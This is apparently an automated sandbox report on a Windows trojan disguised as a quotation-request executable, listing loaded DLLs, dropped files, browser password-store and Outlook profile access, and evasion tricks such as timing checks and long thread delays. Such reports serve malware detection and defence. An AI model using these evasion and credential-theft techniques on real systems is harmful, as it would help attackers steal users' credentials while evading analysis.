            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE8AD85_2_37EE8AD8
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE1A435_2_37EE1A43
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE1A505_2_37EE1A50
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE39E05_2_37EE39E0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE39F05_2_37EE39F0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE08E05_2_37EE08E0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE08F05_2_37EE08F0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE28905_2_37EE2890
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_37EE287F5_2_37EE287F
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_3845D4785_2_3845D478
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_3845E6285_2_3845E628
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_2_384573D05_2_384573D0
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: String function: 00402B3A appears 47 times
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2834768476.0000000034FE7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs Request for Quotation New collaboration.exe
            Source: Request for Quotation New collaboration.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/8@5/5
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_004045CA GetDlgItem,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004045CA
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_0040206A CoCreateInstance,0_2_0040206A
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile created: C:\Users\user\selvsikkerJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeMutant created: NULL
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile created: C:\Users\user\AppData\Local\Temp\nsi7774.tmpJump to behavior
            Source: Request for Quotation New collaboration.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000352C3000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000352B5000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000352A5000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000352D8000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2835640876.00000000352E4000.00000004.00000800.00020000.00000000.sdmp, Request for Quotation New collaboration.exe, 00000005.00000002.2836799710.00000000361ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: Request for Quotation New collaboration.exeReversingLabs: Detection: 52%
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile read: C:\Users\user\Desktop\Request for Quotation New collaboration.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Request for Quotation New collaboration.exe "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess created: C:\Users\user\Desktop\Request for Quotation New collaboration.exe "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess created: C:\Users\user\Desktop\Request for Quotation New collaboration.exe "C:\Users\user\Desktop\Request for Quotation New collaboration.exe"Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: shfolder.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: riched20.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: usp10.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: msls31.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

            Data Obfuscation

            barindex
            Source: Yara matchFile source: 00000000.00000002.2032277835.0000000003E08000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_00406254 GetModuleHandleA,LoadLibraryA,GetProcAddress,0_2_00406254
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 0_2_10002DA0 push eax; ret 0_2_10002DCE
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeCode function: 5_3_001949CC push eax; iretd 5_3_001949CD
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeFile created: C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeAPI/Special instruction interceptor: Address: 414AF04
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeAPI/Special instruction interceptor: Address: 25BAF04
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeRDTSC instruction interceptor: First address: 41115E8 second address: 41115E8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FAC68E83427h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test ch, 00000015h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeRDTSC instruction interceptor: First address: 25815E8 second address: 25815E8 instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, ecx 0x00000004 jc 00007FAC69434737h 0x00000006 inc ebp 0x00000007 inc ebx 0x00000008 test ch, 00000015h 0x0000000b rdtsc
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeMemory allocated: 110000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeMemory allocated: 351C0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeMemory allocated: 34E40000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599671Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599343Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599124Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 599015Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598906Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598796Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598687Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598578Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598468Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598359Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598250Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598140Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 598030Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597921Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597812Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597703Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597593Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597484Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 597046Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596499Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596390Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596281Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596152Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 596046Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595937Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595827Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595718Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595607Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595499Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595390Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595281Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595170Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 595062Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594953Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594843Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594734Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeThread delayed: delay time: 594624Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeWindow / User API: threadDelayed 8659Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeWindow / User API: threadDelayed 1199Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nso7880.tmp\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exeAPI coverage: 3.0 %
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -21213755684765971s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4704Thread sleep count: 8659 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599671s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4704Thread sleep count: 1199 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599343s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599124s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -599015s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598906s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598796s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598687s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598578s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598468s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598359s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598250s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598140s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -598030s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597921s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Request for Quotation New collaboration.exe TID: 4752Thread sleep time: -597812s >= -30000sJump to behavior
